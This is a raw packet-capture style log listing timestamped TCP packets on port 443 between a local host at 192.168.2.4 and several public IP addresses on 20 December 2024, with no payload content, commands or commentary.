                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.199294090 CET49949443192.168.2.4162.159.140.229
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.199301004 CET44349949162.159.140.229192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.245579004 CET49949443192.168.2.4162.159.140.229
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.333843946 CET44349950141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.334280968 CET49950443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.334297895 CET44349950141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.335421085 CET44349950141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.335711956 CET49950443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.335794926 CET44349950141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.335841894 CET49950443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.335854053 CET49950443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.335870981 CET44349950141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.427510977 CET44349952104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.427849054 CET49952443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.427895069 CET44349952104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.429327965 CET44349952104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.429405928 CET49952443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.429954052 CET49952443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.430044889 CET44349952104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.430187941 CET49952443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.430205107 CET44349952104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.466972113 CET44349951104.244.42.67192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.467360973 CET49951443192.168.2.4104.244.42.67
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.467415094 CET44349951104.244.42.67192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.470927954 CET44349951104.244.42.67192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.471040964 CET49951443192.168.2.4104.244.42.67
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.471375942 CET49951443192.168.2.4104.244.42.67
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.471481085 CET49951443192.168.2.4104.244.42.67
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.471497059 CET44349951104.244.42.67192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.471551895 CET44349951104.244.42.67192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.478534937 CET49952443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.525197029 CET49951443192.168.2.4104.244.42.67
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.525235891 CET44349951104.244.42.67192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.564815998 CET44349953104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.565041065 CET49953443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.565087080 CET44349953104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.566679001 CET44349953104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.566775084 CET49953443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.567039967 CET49953443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.567125082 CET44349953104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.567141056 CET49953443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.572107077 CET49951443192.168.2.4104.244.42.67
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.607361078 CET44349953104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.619935989 CET44349942141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.620199919 CET44349942141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.620306969 CET49953443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.620326996 CET44349953104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.620364904 CET49942443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.621016979 CET49942443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.621028900 CET44349942141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.627914906 CET44349949162.159.140.229192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.628107071 CET44349949162.159.140.229192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.628238916 CET49949443192.168.2.4162.159.140.229
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.628784895 CET49949443192.168.2.4162.159.140.229
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.628789902 CET44349949162.159.140.229192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.629407883 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.629436016 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.631283998 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.631618977 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.631633997 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.663482904 CET49953443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.761084080 CET44349941141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.761257887 CET44349941141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.761627913 CET49941443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.761782885 CET49941443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.761825085 CET44349941141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.763492107 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.763506889 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.763834953 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.763834953 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.763855934 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.010354996 CET44349951104.244.42.67192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.010513067 CET44349951104.244.42.67192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.010853052 CET49951443192.168.2.4104.244.42.67
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.010991096 CET49951443192.168.2.4104.244.42.67
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.011028051 CET44349951104.244.42.67192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.033560991 CET44349952104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.033698082 CET44349952104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.033792973 CET44349952104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.033885002 CET49952443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.033906937 CET44349952104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.033957005 CET44349952104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.034017086 CET49952443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.034041882 CET44349952104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.034095049 CET49952443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.034137964 CET44349952104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.034296989 CET44349952104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.034363985 CET49952443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.035094023 CET49952443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.035120010 CET44349952104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.129647017 CET44349953104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.129800081 CET44349953104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.129966974 CET49953443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.130008936 CET44349953104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.130083084 CET44349953104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.130913019 CET49953443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.166856050 CET49953443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.166891098 CET44349953104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.760896921 CET49956443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.760982990 CET44349956104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.761087894 CET49956443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.761538982 CET49956443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.761575937 CET44349956104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.763472080 CET49957443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.763504028 CET44349957104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.763570070 CET49957443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.763814926 CET49957443192.168.2.4104.26.8.50
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.763830900 CET44349957104.26.8.50192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.849659920 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.850208998 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.850229025 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.851358891 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.851982117 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.852158070 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.852184057 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.895375013 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.900648117 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.947052956 CET49958443192.168.2.434.249.70.63
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.947096109 CET4434995834.249.70.63192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.947173119 CET49958443192.168.2.434.249.70.63
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.947582960 CET49958443192.168.2.434.249.70.63
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.947597980 CET4434995834.249.70.63192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.991008997 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.991223097 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.991234064 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.992832899 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.992903948 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.994817019 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.994900942 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.995414972 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.995420933 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.042735100 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.054176092 CET44349950141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.054465055 CET44349950141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.054524899 CET49950443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.059931040 CET49950443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.059942961 CET44349950141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.074747086 CET49959443192.168.2.43.164.85.129
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.074876070 CET443499593.164.85.129192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.074975014 CET49959443192.168.2.43.164.85.129
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.076126099 CET49959443192.168.2.43.164.85.129
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.076163054 CET443499593.164.85.129192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.298016071 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.298140049 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.298193932 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.298206091 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.298300982 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.298346043 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.298352957 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.298459053 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.298508883 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.298515081 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.299896002 CET49960443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.299916983 CET44349960141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.299979925 CET49960443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.300179958 CET49960443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.300193071 CET44349960141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.306162119 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.306226969 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.306233883 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.349672079 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.349678993 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.374077082 CET49961443192.168.2.454.149.202.3
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.374094963 CET4434996154.149.202.3192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.374161005 CET49961443192.168.2.454.149.202.3
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.374600887 CET49961443192.168.2.454.149.202.3
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.374612093 CET4434996154.149.202.3192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.397579908 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.417593956 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.423041105 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.423127890 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.423196077 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.423197985 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.423216105 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.423265934 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.423280001 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.431200027 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.431283951 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.431333065 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.431344032 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.431386948 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.439629078 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.447901964 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.447972059 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.447979927 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.460042000 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.460050106 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.490453005 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.493805885 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.493870020 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.493876934 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.502068043 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.502124071 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.502130032 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.510011911 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.510070086 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.510077000 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.518246889 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.518301010 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.518307924 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.526550055 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.526603937 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.526611090 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.534636021 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.534692049 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.534699917 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.542733908 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.542825937 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.542889118 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.542896032 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.559022903 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.559086084 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.559093952 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.566001892 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.566088915 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.566095114 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.573019028 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.573077917 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.573085070 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.580101967 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.580173016 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.580178976 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.583291054 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.583297968 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.587220907 CET4434994762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.587280989 CET4434994762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.587343931 CET49947443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.587352037 CET4434994762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.587393999 CET49947443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.593679905 CET4434994762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.593703032 CET4434994762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.593744993 CET49947443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.611077070 CET4434994762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.611140966 CET49947443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.611149073 CET4434994762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.611196041 CET49947443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.618649006 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.618731022 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.618738890 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.626997948 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.627121925 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.627126932 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.629807949 CET49954443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.630269051 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.630372047 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.630376101 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.647027016 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.647114038 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.647119999 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.655397892 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.655477047 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.655524969 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.655530930 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.656109095 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.663717031 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.672070026 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.672161102 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.672167063 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.680605888 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.680735111 CET49955443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.680740118 CET44349955104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.681874990 CET44349954141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.684468985 CET44349954141.193.213.11192.168.2.4
